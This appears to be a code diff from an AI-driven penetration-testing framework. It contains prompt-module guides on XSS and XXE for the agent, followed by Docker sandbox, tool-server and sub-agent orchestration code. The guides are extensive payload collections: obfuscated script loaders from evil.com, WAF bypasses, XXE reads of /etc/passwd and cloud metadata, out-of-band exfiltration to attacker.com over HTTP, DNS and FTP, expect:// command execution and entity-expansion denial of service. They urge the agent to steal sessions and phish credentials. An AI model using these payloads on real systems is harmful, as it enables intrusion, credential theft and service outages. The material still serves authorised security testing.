- JavaScript in links: <a href="javascript:app.alert(1)">
- Form actions: <form action="javascript:...">
</pdf_generation>
<email_clients>
- Limited tags: <a>, <img>, <style>
- CSS injection: <style>@import'//evil.com/css'</style>
</email_clients>
<markdown>
[Click](javascript:alert(1))
![a](x"onerror="alert(1))
</markdown>
<react_vue>
- dangerouslySetInnerHTML={{__html: payload}}
- v-html directive bypass
</react_vue>
<file_upload_xss>
- SVG: <svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"/>
- HTML files
- XML with XSLT
- MIME type confusion
</file_upload_xss>
</special_contexts>
<blind_xss>
<detection>
- Out-of-band callbacks
- Service workers for persistence
- Polyglot payloads for multiple contexts
</detection>
<payloads>
'"><script src=//evil.com/blindxss.js></script>
'"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Ii8vZXZpbC5jb20veHNzLmpzIjtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw onerror=eval(atob(this.id))>
</payloads>
</blind_xss>
<waf_bypasses>
<encoding>
- HTML: &#x3C;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3E;
- URL: %3Cscript%3E
- Unicode: \u003cscript\u003e
- Mixed: <scr\x69pt>
</encoding>
<obfuscation>
<a href="j&#x61;vascript:alert(1)">
<img src=x onerror="\u0061\u006C\u0065\u0072\u0074(1)">
<svg/onload=eval(atob('YWxlcnQoMSk='))>
</obfuscation>
<browser_bugs>
- Chrome: <svg><script>alert&lpar;1&rpar;
- Firefox specific payloads
- IE/Edge compatibility
</browser_bugs>
</waf_bypasses>
<impact_demonstration>
1. Account takeover via cookie/token theft
2. Defacement proof
3. Keylogging demonstration
4. Internal network scanning
5. Cryptocurrency miner injection
6. Phishing form injection
7. Browser exploit delivery
8. Session hijacking
9. CSRF attack chaining
10. Admin panel access
</impact_demonstration>
<pro_tips>
1. Test in all browsers - payloads vary
2. Check mobile versions - different parsers
3. Use automation for blind XSS
4. Chain with other vulnerabilities
5. Focus on impact, not just alert(1)
6. Test all input vectors systematically
7. Understand the context deeply
8. Keep payload library updated
9. Monitor CSP headers
10. Think beyond script tags
</pro_tips>
<remember>Modern XSS is about bypassing filters, CSP, and WAFs. Focus on real impact - steal sessions, phish credentials, or deliver exploits. Simple alert(1) is just the beginning.</remember>
</xss_vulnerability_guide>

<xxe_vulnerability_guide>
<title>XML EXTERNAL ENTITY (XXE) - ADVANCED EXPLOITATION</title>
<critical>XXE leads to file disclosure, SSRF, RCE, and DoS. Often found in APIs, file uploads, and document parsers.</critical>
<discovery_points>
- XML file uploads (docx, xlsx, svg, xml)
- SOAP endpoints
- REST APIs accepting XML
- SAML implementations
- RSS/Atom feeds
- XML configuration files
- WebDAV
- Office document processors
- SVG image uploads
- PDF generators with XML input
</discovery_points>
<basic_payloads>
<file_disclosure>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root>&xxe;</root>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">]>
<root>&xxe;</root>
</file_disclosure>
<ssrf_via_xxe>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">]>
<root>&xxe;</root>
</ssrf_via_xxe>
<blind_xxe_oob>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd"> %xxe;]>
evil.dtd:
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://attacker.com/?x=%file;'>">
%eval;
%exfiltrate;
</blind_xxe_oob>
</basic_payloads>
<advanced_techniques>
<parameter_entities>
<!DOCTYPE foo [
<!ENTITY % data SYSTEM "file:///etc/passwd">
<!ENTITY % param "<!ENTITY &#x25; exfil SYSTEM 'http://evil.com/?d=%data;'>">
%param;
%exfil;
]>
</parameter_entities>
<error_based_xxe>
<!DOCTYPE foo [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
]>
</error_based_xxe>
<xxe_in_attributes>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root attr="&xxe;"/>
</xxe_in_attributes>
</advanced_techniques>
<filter_bypasses>
<encoding_tricks>
- UTF-16: <?xml version="1.0" encoding="UTF-16"?>
- UTF-7: <?xml version="1.0" encoding="UTF-7"?>
- Base64 in CDATA: <![CDATA[base64_payload]]>
</encoding_tricks>
<protocol_variations>
- file:// → file:
- file:// → netdoc://
- http:// → https://
- Gopher: gopher://
- PHP wrappers: php://filter/convert.base64-encode/resource=/etc/passwd
</protocol_variations>
<doctype_variations>
<!doctype foo [
<!DoCtYpE foo [
<!DOCTYPE foo PUBLIC "Any" "http://evil.com/evil.dtd">
<!DOCTYPE foo SYSTEM "http://evil.com/evil.dtd">
</doctype_variations>
</filter_bypasses>
<specific_contexts>
<json_xxe>
{"name": "test", "content": "<?xml version='1.0'?><!DOCTYPE foo [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]><x>&xxe;</x>"}
</json_xxe>
<soap_xxe>
<!-- the DOCTYPE must precede the root element, not sit inside the body -->
<!DOCTYPE soap:Envelope [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <foo>&xxe;</foo>
  </soap:Body>
</soap:Envelope>
</soap_xxe>
<svg_xxe>
<!DOCTYPE svg [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<svg xmlns="http://www.w3.org/2000/svg">
  <text>&xxe;</text>
</svg>
</svg_xxe>
<docx_xlsx_xxe>
1. Unzip document
2. Edit document.xml or similar
3. Add XXE payload
4. Rezip and upload
</docx_xlsx_xxe>
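The four steps above can be scripted without shelling out to zip tools; `inject_xxe` below is a hypothetical helper (the `word/document.xml` path is the standard OOXML location):

```python
# Hypothetical helper implementing steps 1-4: a .docx/.xlsx is just a zip,
# so rewrite word/document.xml with a DOCTYPE injected after the XML declaration.
import zipfile


def inject_xxe(docx_in: str, docx_out: str, payload_dtd: str) -> None:
    with zipfile.ZipFile(docx_in) as src, zipfile.ZipFile(docx_out, "w") as dst:
        for item in src.infolist():
            data = src.read(item.filename)
            if item.filename == "word/document.xml":  # use xl/workbook.xml for .xlsx
                decl, sep, rest = data.partition(b"?>")
                if sep:
                    data = decl + sep + payload_dtd.encode() + rest
                else:  # no XML declaration: prepend the DTD
                    data = payload_dtd.encode() + data
            dst.writestr(item, data)
```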
</specific_contexts>
<blind_xxe_techniques>
<dns_exfiltration>
<!DOCTYPE foo [
<!ENTITY % data SYSTEM "file:///etc/hostname">
<!ENTITY % param "<!ENTITY &#x25; exfil SYSTEM 'http://%data;.attacker.com/'>">
%param;
%exfil;
]>
</dns_exfiltration>
<ftp_exfiltration>
<!DOCTYPE foo [
<!ENTITY % data SYSTEM "file:///etc/passwd">
<!ENTITY % param "<!ENTITY &#x25; exfil SYSTEM 'ftp://attacker.com:2121/%data;'>">
%param;
%exfil;
]>
</ftp_exfiltration>
<php_wrappers>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
]>
<root>&xxe;</root>
</php_wrappers>
</blind_xxe_techniques>
<xxe_to_rce>
<expect_module>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "expect://id">]>
<root>&xxe;</root>
</expect_module>
<file_upload_lfi>
1. Upload malicious PHP via XXE
2. Include via LFI or direct access
</file_upload_lfi>
<java_specific>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "jar:file:///tmp/evil.jar!/evil.class">]>
</java_specific>
</xxe_to_rce>
<denial_of_service>
<billion_laughs>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;">
]>
<lolz>&lol5;</lolz>
</billion_laughs>
<external_dtd_dos>
<!DOCTYPE foo SYSTEM "http://slow-server.com/huge.dtd">
</external_dtd_dos>
</denial_of_service>
<modern_bypasses>
<xinclude>
<root xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/>
</root>
</xinclude>
<xslt>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
<xsl:copy-of select="document('file:///etc/passwd')"/>
</xsl:template>
</xsl:stylesheet>
</xslt>
</modern_bypasses>
<parser_specific>
<java>
- Supports jar: protocol
- External DTDs by default
- Parameter entities work
</java>
<dotnet>
- Supports file:// by default
- DTD processing varies by version
</dotnet>
<php>
- libxml2 based
- expect:// protocol with expect module
- php:// wrappers
</php>
<python>
- Stdlib parser behavior varies by version; older releases expanded entities
- Use defusedxml; don't assume lxml or xml.etree defaults are safe
</python>
</parser_specific>
<validation_testing>
<detection>
1. Basic entity test: &xxe;
2. External DTD: http://attacker.com/test.dtd
3. Parameter entity: %xxe;
4. Time-based: DTD with slow server
5. DNS lookup: http://test.attacker.com/
</detection>
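The detection steps above are easiest to correlate when each probe carries a unique marker; a sketch, where `attacker.com` stands in for an OOB domain you control and `detection_payloads` is a hypothetical helper:

```python
# Tag every probe with a unique ID so a hit on your OOB listener (DNS log or
# HTTP access log) can be tied back to the exact request that triggered it.
import uuid


def detection_payloads(oob_domain: str = "attacker.com") -> tuple[str, list[str]]:
    probe_id = uuid.uuid4().hex[:8]
    return probe_id, [
        # external DTD fetch (step 2)
        f'<!DOCTYPE r [<!ENTITY xxe SYSTEM "http://{probe_id}.{oob_domain}/t.dtd">]><r>&xxe;</r>',
        # parameter entity -- works even when general entities are filtered (step 3)
        f'<!DOCTYPE r [<!ENTITY % p SYSTEM "http://{probe_id}.{oob_domain}/p.dtd"> %p;]><r/>',
        # bare DNS/HTTP lookup for blind confirmation (step 5)
        f'<!DOCTYPE r [<!ENTITY xxe SYSTEM "http://{probe_id}.{oob_domain}/">]><r>&xxe;</r>',
    ]
```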
<false_positives>
- Entity declared but not processed
- DTD loaded but entities blocked
- Output encoding preventing exploitation
- Limited file access (chroot/sandbox)
</false_positives>
</validation_testing>
<impact_demonstration>
1. Read sensitive files (/etc/passwd, web.config)
2. Cloud metadata access (AWS keys)
3. Internal network scanning (SSRF)
4. Data exfiltration proof
5. DoS demonstration
6. RCE if possible
</impact_demonstration>
<automation>
# XXE scanner sketch (requires the `requests` library; check_callback() is a
# placeholder for polling your out-of-band DNS/HTTP listener)
import requests

def test_xxe(url, param):
    payloads = [
        '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>',
        '<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attacker.com/"> %xxe;]><foo/>',
        '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>',
    ]
    for payload in payloads:
        response = requests.post(url, data={param: payload}, timeout=10)
        if "root:" in response.text or check_callback():
            return f"XXE found with: {payload}"
    return None
</automation>
<pro_tips>
1. Try all protocols, not just file://
2. Use parameter entities for blind XXE
3. Chain with SSRF for cloud metadata
4. Test different encodings (UTF-16)
5. Don't forget JSON/SOAP contexts
6. XInclude when entities are blocked
7. Error messages reveal file paths
8. Monitor DNS for blind confirmation
9. Some parsers allow network access but not files
10. Modern frameworks disable XXE by default - check configs
</pro_tips>
<remember>XXE is about understanding parser behavior. Different parsers have different features and restrictions. Always test comprehensively and demonstrate maximum impact.</remember>
</xxe_vulnerability_guide>
strix/runtime/__init__.py Normal file
@@ -0,0 +1,19 @@
import os
from .runtime import AbstractRuntime
def get_runtime() -> AbstractRuntime:
runtime_backend = os.getenv("STRIX_RUNTIME_BACKEND", "docker")
if runtime_backend == "docker":
from .docker_runtime import DockerRuntime
return DockerRuntime()
raise ValueError(
f"Unsupported runtime backend: {runtime_backend}. Only 'docker' is supported for now."
)
__all__ = ["AbstractRuntime", "get_runtime"]
@@ -0,0 +1,271 @@
import logging
import os
import secrets
import socket
import time
from pathlib import Path
from typing import cast
import docker
from docker.errors import DockerException, NotFound
from docker.models.containers import Container
from .runtime import AbstractRuntime, SandboxInfo
STRIX_AGENT_LABEL = "StrixAgent_ID"
STRIX_SCAN_LABEL = "StrixScan_ID"
STRIX_IMAGE = os.getenv("STRIX_IMAGE", "ghcr.io/usestrix/strix-sandbox:0.1.4")
logger = logging.getLogger(__name__)
_initialized_volumes: set[str] = set()
class DockerRuntime(AbstractRuntime):
def __init__(self) -> None:
try:
self.client = docker.from_env()
except DockerException as e:
logger.exception("Failed to connect to Docker daemon")
raise RuntimeError("Docker is not available or not configured correctly.") from e
def _generate_sandbox_token(self) -> str:
return secrets.token_urlsafe(32)
def _get_scan_id(self, agent_id: str) -> str:
try:
from strix.cli.tracer import get_global_tracer
tracer = get_global_tracer()
if tracer and tracer.scan_config:
return str(tracer.scan_config.get("scan_id", "default-scan"))
except ImportError:
logger.debug("Failed to import tracer, using fallback scan ID")
except AttributeError:
logger.debug("Tracer missing scan_config, using fallback scan ID")
return f"scan-{agent_id.split('-')[0]}"
def _find_available_port(self) -> int:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.bind(("", 0))
return cast("int", s.getsockname()[1])
def _get_workspace_volume_name(self, scan_id: str) -> str:
return f"strix-workspace-{scan_id}"
def _get_sandbox_by_agent_id(self, agent_id: str) -> Container | None:
try:
containers = self.client.containers.list(
filters={"label": f"{STRIX_AGENT_LABEL}={agent_id}"}
)
if not containers:
return None
if len(containers) > 1:
logger.warning(
"Multiple sandboxes found for agent ID %s, using the first one.", agent_id
)
return cast("Container", containers[0])
except DockerException as e:
logger.warning("Failed to get sandbox by agent ID %s: %s", agent_id, e)
return None
def _ensure_workspace_volume(self, volume_name: str) -> None:
try:
self.client.volumes.get(volume_name)
logger.info(f"Using existing workspace volume: {volume_name}")
except NotFound:
self.client.volumes.create(name=volume_name, driver="local")
logger.info(f"Created new workspace volume: {volume_name}")
def _copy_local_directory_to_container(self, container: Container, local_path: str) -> None:
import tarfile
from io import BytesIO
try:
local_path_obj = Path(local_path).resolve()
if not local_path_obj.exists() or not local_path_obj.is_dir():
logger.warning(f"Local path does not exist or is not a directory: {local_path_obj}")
return
logger.info(f"Copying local directory {local_path_obj} to container {container.id}")
tar_buffer = BytesIO()
with tarfile.open(fileobj=tar_buffer, mode="w") as tar:
for item in local_path_obj.rglob("*"):
if item.is_file():
arcname = item.relative_to(local_path_obj)
tar.add(item, arcname=arcname)
tar_buffer.seek(0)
container.put_archive("/shared_workspace", tar_buffer.getvalue())
container.exec_run(
"chown -R pentester:pentester /shared_workspace && chmod -R 755 /shared_workspace",
user="root",
)
logger.info(
f"Successfully copied {local_path_obj} to /shared_workspace in container "
f"{container.id}"
)
except (OSError, DockerException):
logger.exception("Failed to copy local directory to container")
async def create_sandbox(
self, agent_id: str, existing_token: str | None = None, local_source_path: str | None = None
) -> SandboxInfo:
sandbox = self._get_sandbox_by_agent_id(agent_id)
auth_token = existing_token or self._generate_sandbox_token()
scan_id = self._get_scan_id(agent_id)
volume_name = self._get_workspace_volume_name(scan_id)
self._ensure_workspace_volume(volume_name)
if not sandbox:
logger.info("Creating new Docker sandbox for agent %s", agent_id)
try:
tool_server_port = self._find_available_port()
caido_port = self._find_available_port()
volumes_config = {volume_name: {"bind": "/shared_workspace", "mode": "rw"}}
container_name = f"strix-{agent_id}"
sandbox = self.client.containers.run(
STRIX_IMAGE,
command="sleep infinity",
detach=True,
name=container_name,
hostname=container_name,
ports={
f"{tool_server_port}/tcp": tool_server_port,
f"{caido_port}/tcp": caido_port,
},
cap_add=["NET_ADMIN", "NET_RAW"],
labels={
STRIX_AGENT_LABEL: agent_id,
STRIX_SCAN_LABEL: scan_id,
},
environment={
"PYTHONUNBUFFERED": "1",
"STRIX_AGENT_ID": agent_id,
"STRIX_SANDBOX_TOKEN": auth_token,
"STRIX_TOOL_SERVER_PORT": str(tool_server_port),
"CAIDO_PORT": str(caido_port),
},
volumes=volumes_config,
tty=True,
)
logger.info(
"Created new sandbox %s for agent %s with shared workspace %s",
sandbox.id,
agent_id,
volume_name,
)
except DockerException as e:
raise RuntimeError(f"Failed to create Docker sandbox: {e}") from e
assert sandbox is not None
if sandbox.status != "running":
sandbox.start()
time.sleep(15)
if local_source_path and volume_name not in _initialized_volumes:
self._copy_local_directory_to_container(sandbox, local_source_path)
_initialized_volumes.add(volume_name)
sandbox_id = sandbox.id
if sandbox_id is None:
raise RuntimeError("Docker container ID is unexpectedly None")
        env_vars = sandbox.attrs["Config"]["Env"]
        tool_server_port_str = next(
            (
                var.split("=", 1)[1]
                for var in env_vars
                if var.startswith("STRIX_TOOL_SERVER_PORT=")
            ),
            None,
        )
        if tool_server_port_str is None:
            raise RuntimeError("STRIX_TOOL_SERVER_PORT not found in sandbox environment")
        tool_server_port = int(tool_server_port_str)
api_url = await self.get_sandbox_url(sandbox_id, tool_server_port)
return {
"workspace_id": sandbox_id,
"api_url": api_url,
"auth_token": auth_token,
"tool_server_port": tool_server_port,
}
async def get_sandbox_url(self, sandbox_id: str, port: int) -> str:
try:
container = self.client.containers.get(sandbox_id)
container.reload()
host = "localhost"
if "DOCKER_HOST" in os.environ:
docker_host = os.environ["DOCKER_HOST"]
if "://" in docker_host:
host = docker_host.split("://")[1].split(":")[0]
except NotFound:
raise ValueError(f"Sandbox {sandbox_id} not found.") from None
except DockerException as e:
raise RuntimeError(f"Failed to get sandbox URL for {sandbox_id}: {e}") from e
else:
return f"http://{host}:{port}"
async def destroy_sandbox(self, sandbox_id: str) -> None:
logger.info("Destroying Docker sandbox %s", sandbox_id)
try:
container = self.client.containers.get(sandbox_id)
scan_id = None
if container.labels and STRIX_SCAN_LABEL in container.labels:
scan_id = container.labels[STRIX_SCAN_LABEL]
container.stop()
container.remove()
logger.info("Successfully destroyed sandbox %s", sandbox_id)
if scan_id:
await self._cleanup_workspace_if_empty(scan_id)
except NotFound:
logger.warning("Sandbox %s not found for destruction.", sandbox_id)
except DockerException as e:
logger.warning("Failed to destroy sandbox %s: %s", sandbox_id, e)
async def _cleanup_workspace_if_empty(self, scan_id: str) -> None:
try:
volume_name = self._get_workspace_volume_name(scan_id)
containers = self.client.containers.list(
all=True, filters={"label": f"{STRIX_SCAN_LABEL}={scan_id}"}
)
if not containers:
try:
volume = self.client.volumes.get(volume_name)
volume.remove()
logger.info(
f"Cleaned up workspace volume {volume_name} for completed scan {scan_id}"
)
_initialized_volumes.discard(volume_name)
except NotFound:
logger.debug(f"Volume {volume_name} already removed")
except DockerException as e:
logger.warning(f"Failed to remove volume {volume_name}: {e}")
except DockerException as e:
logger.warning("Error during workspace cleanup for scan %s: %s", scan_id, e)
async def cleanup_scan_workspace(self, scan_id: str) -> None:
await self._cleanup_workspace_if_empty(scan_id)
strix/runtime/runtime.py Normal file
@@ -0,0 +1,25 @@
from abc import ABC, abstractmethod
from typing import TypedDict
class SandboxInfo(TypedDict):
workspace_id: str
api_url: str
auth_token: str | None
tool_server_port: int
class AbstractRuntime(ABC):
@abstractmethod
async def create_sandbox(
self, agent_id: str, existing_token: str | None = None, local_source_path: str | None = None
) -> SandboxInfo:
raise NotImplementedError
@abstractmethod
async def get_sandbox_url(self, sandbox_id: str, port: int) -> str:
raise NotImplementedError
@abstractmethod
async def destroy_sandbox(self, sandbox_id: str) -> None:
raise NotImplementedError
@@ -0,0 +1,97 @@
import logging
import os
from typing import Any
from fastapi import Depends, FastAPI, HTTPException, status
from fastapi.security import HTTPAuthorizationCredentials, HTTPBearer
from pydantic import BaseModel, ValidationError
SANDBOX_MODE = os.getenv("STRIX_SANDBOX_MODE", "false").lower() == "true"
if not SANDBOX_MODE:
raise RuntimeError("Tool server should only run in sandbox mode (STRIX_SANDBOX_MODE=true)")
EXPECTED_TOKEN = os.getenv("STRIX_SANDBOX_TOKEN")
if not EXPECTED_TOKEN:
raise RuntimeError("STRIX_SANDBOX_TOKEN environment variable is required in sandbox mode")
app = FastAPI()
logger = logging.getLogger(__name__)
security = HTTPBearer()
security_dependency = Depends(security)
def verify_token(credentials: HTTPAuthorizationCredentials) -> str:
if not credentials or credentials.scheme != "Bearer":
logger.warning("Authentication failed: Invalid or missing Bearer token scheme")
raise HTTPException(
status_code=status.HTTP_401_UNAUTHORIZED,
detail="Invalid authentication scheme. Bearer token required.",
headers={"WWW-Authenticate": "Bearer"},
)
if credentials.credentials != EXPECTED_TOKEN:
logger.warning("Authentication failed: Invalid token provided from remote host")
raise HTTPException(
status_code=status.HTTP_401_UNAUTHORIZED,
detail="Invalid authentication token",
headers={"WWW-Authenticate": "Bearer"},
)
logger.debug("Authentication successful for tool execution request")
return credentials.credentials
class ToolExecutionRequest(BaseModel):
tool_name: str
kwargs: dict[str, Any]
class ToolExecutionResponse(BaseModel):
result: Any | None = None
error: str | None = None
@app.post("/execute", response_model=ToolExecutionResponse)
async def execute_tool(
request: ToolExecutionRequest, credentials: HTTPAuthorizationCredentials = security_dependency
) -> ToolExecutionResponse:
verify_token(credentials)
from strix.tools.argument_parser import ArgumentConversionError, convert_arguments
from strix.tools.registry import get_tool_by_name
try:
tool_func = get_tool_by_name(request.tool_name)
if not tool_func:
return ToolExecutionResponse(error=f"Tool '{request.tool_name}' not found")
converted_kwargs = convert_arguments(tool_func, request.kwargs)
result = tool_func(**converted_kwargs)
return ToolExecutionResponse(result=result)
except (ArgumentConversionError, ValidationError) as e:
logger.warning("Invalid tool arguments: %s", e)
return ToolExecutionResponse(error=f"Invalid arguments: {e}")
except TypeError as e:
logger.warning("Tool execution type error: %s", e)
return ToolExecutionResponse(error=f"Tool execution error: {e}")
except ValueError as e:
logger.warning("Tool execution value error: %s", e)
return ToolExecutionResponse(error=f"Tool execution error: {e}")
except Exception:
logger.exception("Unexpected error during tool execution")
return ToolExecutionResponse(error="Internal server error")
@app.get("/health")
async def health_check() -> dict[str, str]:
return {
"status": "healthy",
"sandbox_mode": str(SANDBOX_MODE),
"environment": "sandbox" if SANDBOX_MODE else "main",
"auth_configured": "true" if EXPECTED_TOKEN else "false",
}
strix/tools/__init__.py Normal file
@@ -0,0 +1,64 @@
import os
from .executor import (
execute_tool,
execute_tool_invocation,
execute_tool_with_validation,
extract_screenshot_from_result,
process_tool_invocations,
remove_screenshot_from_result,
validate_tool_availability,
)
from .registry import (
ImplementedInClientSideOnlyError,
get_tool_by_name,
get_tool_names,
get_tools_prompt,
needs_agent_state,
register_tool,
tools,
)
SANDBOX_MODE = os.getenv("STRIX_SANDBOX_MODE", "false").lower() == "true"
HAS_PERPLEXITY_API = bool(os.getenv("PERPLEXITY_API_KEY"))
if not SANDBOX_MODE:
from .agents_graph import * # noqa: F403
from .browser import * # noqa: F403
from .file_edit import * # noqa: F403
from .finish import * # noqa: F403
from .notes import * # noqa: F403
from .proxy import * # noqa: F403
from .python import * # noqa: F403
from .reporting import * # noqa: F403
from .terminal import * # noqa: F403
from .thinking import * # noqa: F403
if HAS_PERPLEXITY_API:
from .web_search import * # noqa: F403
else:
from .browser import * # noqa: F403
from .file_edit import * # noqa: F403
from .notes import * # noqa: F403
from .proxy import * # noqa: F403
from .python import * # noqa: F403
from .terminal import * # noqa: F403
__all__ = [
"ImplementedInClientSideOnlyError",
"execute_tool",
"execute_tool_invocation",
"execute_tool_with_validation",
"extract_screenshot_from_result",
"get_tool_by_name",
"get_tool_names",
"get_tools_prompt",
"needs_agent_state",
"process_tool_invocations",
"register_tool",
"remove_screenshot_from_result",
"tools",
"validate_tool_availability",
]
@@ -0,0 +1,16 @@
from .agents_graph_actions import (
agent_finish,
create_agent,
send_message_to_agent,
view_agent_graph,
wait_for_message,
)
__all__ = [
"agent_finish",
"create_agent",
"send_message_to_agent",
"view_agent_graph",
"wait_for_message",
]
@@ -0,0 +1,610 @@
import threading
from datetime import UTC, datetime
from typing import Any, Literal
from strix.tools.registry import register_tool
_agent_graph: dict[str, Any] = {
"nodes": {},
"edges": [],
}
_root_agent_id: str | None = None
_agent_messages: dict[str, list[dict[str, Any]]] = {}
_running_agents: dict[str, threading.Thread] = {}
_agent_instances: dict[str, Any] = {}
_agent_states: dict[str, Any] = {}
def _run_agent_in_thread(
agent: Any, state: Any, inherited_messages: list[dict[str, Any]]
) -> dict[str, Any]:
try:
if inherited_messages:
state.add_message("user", "<inherited_context_from_parent>")
for msg in inherited_messages:
state.add_message(msg["role"], msg["content"])
state.add_message("user", "</inherited_context_from_parent>")
parent_info = _agent_graph["nodes"].get(state.parent_id, {})
parent_name = parent_info.get("name", "Unknown Parent")
context_status = (
"inherited conversation context from your parent for background understanding"
if inherited_messages
else "started with a fresh context"
)
task_xml = f"""<agent_delegation>
<identity>
⚠️ You are NOT your parent agent. You are a NEW, SEPARATE sub-agent (not root).
Your Info: {state.agent_name} ({state.agent_id})
Parent Info: {parent_name} ({state.parent_id})
</identity>
<your_task>{state.task}</your_task>
<instructions>
- You have {context_status}
- Inherited context is for BACKGROUND ONLY - don't continue parent's work
- Focus EXCLUSIVELY on your delegated task above
- Work independently with your own approach
- Use agent_finish when complete to report back to parent
- You are a SPECIALIST for this specific task
</instructions>
</agent_delegation>"""
state.add_message("user", task_xml)
_agent_states[state.agent_id] = state
_agent_graph["nodes"][state.agent_id]["state"] = state.model_dump()
import asyncio
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
try:
result = loop.run_until_complete(agent.agent_loop(state.task))
finally:
loop.close()
except Exception as e:
_agent_graph["nodes"][state.agent_id]["status"] = "error"
_agent_graph["nodes"][state.agent_id]["finished_at"] = datetime.now(UTC).isoformat()
_agent_graph["nodes"][state.agent_id]["result"] = {"error": str(e)}
_running_agents.pop(state.agent_id, None)
_agent_instances.pop(state.agent_id, None)
raise
else:
if state.stop_requested:
_agent_graph["nodes"][state.agent_id]["status"] = "stopped"
else:
_agent_graph["nodes"][state.agent_id]["status"] = "completed"
_agent_graph["nodes"][state.agent_id]["finished_at"] = datetime.now(UTC).isoformat()
_agent_graph["nodes"][state.agent_id]["result"] = result
_running_agents.pop(state.agent_id, None)
_agent_instances.pop(state.agent_id, None)
return {"result": result}
@register_tool(sandbox_execution=False)
def view_agent_graph(agent_state: Any) -> dict[str, Any]:
try:
structure_lines = ["=== AGENT GRAPH STRUCTURE ==="]
def _build_tree(agent_id: str, depth: int = 0) -> None:
node = _agent_graph["nodes"][agent_id]
indent = " " * depth
you_indicator = " ← This is you" if agent_id == agent_state.agent_id else ""
structure_lines.append(f"{indent}* {node['name']} ({agent_id}){you_indicator}")
structure_lines.append(f"{indent} Task: {node['task']}")
structure_lines.append(f"{indent} Status: {node['status']}")
children = [
edge["to"]
for edge in _agent_graph["edges"]
if edge["from"] == agent_id and edge["type"] == "delegation"
]
if children:
structure_lines.append(f"{indent} Children:")
for child_id in children:
_build_tree(child_id, depth + 2)
root_agent_id = _root_agent_id
if not root_agent_id and _agent_graph["nodes"]:
for agent_id, node in _agent_graph["nodes"].items():
if node.get("parent_id") is None:
root_agent_id = agent_id
break
if not root_agent_id:
root_agent_id = next(iter(_agent_graph["nodes"].keys()))
if root_agent_id and root_agent_id in _agent_graph["nodes"]:
_build_tree(root_agent_id)
else:
structure_lines.append("No agents in the graph yet")
graph_structure = "\n".join(structure_lines)
total_nodes = len(_agent_graph["nodes"])
running_count = sum(
1 for node in _agent_graph["nodes"].values() if node["status"] == "running"
)
waiting_count = sum(
1 for node in _agent_graph["nodes"].values() if node["status"] == "waiting"
)
stopping_count = sum(
1 for node in _agent_graph["nodes"].values() if node["status"] == "stopping"
)
completed_count = sum(
1 for node in _agent_graph["nodes"].values() if node["status"] == "completed"
)
stopped_count = sum(
1 for node in _agent_graph["nodes"].values() if node["status"] == "stopped"
)
failed_count = sum(
1 for node in _agent_graph["nodes"].values() if node["status"] in ["failed", "error"]
)
except Exception as e: # noqa: BLE001
return {
"error": f"Failed to view agent graph: {e}",
"graph_structure": "Error retrieving graph structure",
}
else:
return {
"graph_structure": graph_structure,
"summary": {
"total_agents": total_nodes,
"running": running_count,
"waiting": waiting_count,
"stopping": stopping_count,
"completed": completed_count,
"stopped": stopped_count,
"failed": failed_count,
},
}
@register_tool(sandbox_execution=False)
def create_agent(
agent_state: Any,
task: str,
name: str,
inherit_context: bool = True,
prompt_modules: str | None = None,
) -> dict[str, Any]:
try:
parent_id = agent_state.agent_id
module_list = []
if prompt_modules:
module_list = [m.strip() for m in prompt_modules.split(",") if m.strip()]
if "root_agent" in module_list:
return {
"success": False,
"error": (
"The 'root_agent' module is reserved for the main agent "
"and cannot be used by sub-agents"
),
"agent_id": None,
}
if len(module_list) > 3:
return {
"success": False,
"error": (
"Cannot specify more than 3 prompt modules for an agent "
"(use comma-separated format)"
),
"agent_id": None,
}
if module_list:
from strix.prompts import get_all_module_names, validate_module_names
validation = validate_module_names(module_list)
if validation["invalid"]:
available_modules = list(get_all_module_names())
return {
"success": False,
"error": (
f"Invalid prompt modules: {validation['invalid']}. "
f"Available modules: {', '.join(available_modules)}"
),
"agent_id": None,
}
from strix.agents import StrixAgent
from strix.agents.state import AgentState
from strix.llm.config import LLMConfig
state = AgentState(task=task, agent_name=name, parent_id=parent_id, max_iterations=200)
llm_config = LLMConfig(prompt_modules=module_list)
agent = StrixAgent(
{
"llm_config": llm_config,
"state": state,
}
)
inherited_messages = []
if inherit_context:
inherited_messages = agent_state.get_conversation_history()
_agent_instances[state.agent_id] = agent
